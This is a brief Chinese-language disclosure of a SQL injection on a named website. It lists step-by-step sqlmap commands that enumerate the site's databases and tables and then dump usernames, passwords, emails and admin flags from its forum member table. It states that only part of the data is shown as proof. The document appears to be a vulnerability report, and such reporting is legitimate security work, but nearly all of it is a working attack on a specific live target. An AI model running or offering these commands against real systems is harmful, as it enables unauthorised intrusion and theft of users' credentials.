1.注入点:
http://www.utt.com.cn/appexampleview.php?id=1104
2.爆库
sqlmap -u http://www.utt.com.cn/appexampleview.php?id=1104 --dbs
3.爆表
sqlmap -u http://www.utt.com.cn/appexampleview.php?id=1104 -D utt --tables --batch
4.爆论坛用户表字段
sqlmap -u http://www.utt.com.cn/appexampleview.php?id=1104 -D utt -T disx_common_member --columns --batch
5.爆字段
sqlmap -u http://www.utt.com.cn/appexampleview.php?id=1104 -D utt -T disx_common_member -C username,password,email,adminid --count --batch
数据量大报一部分证明!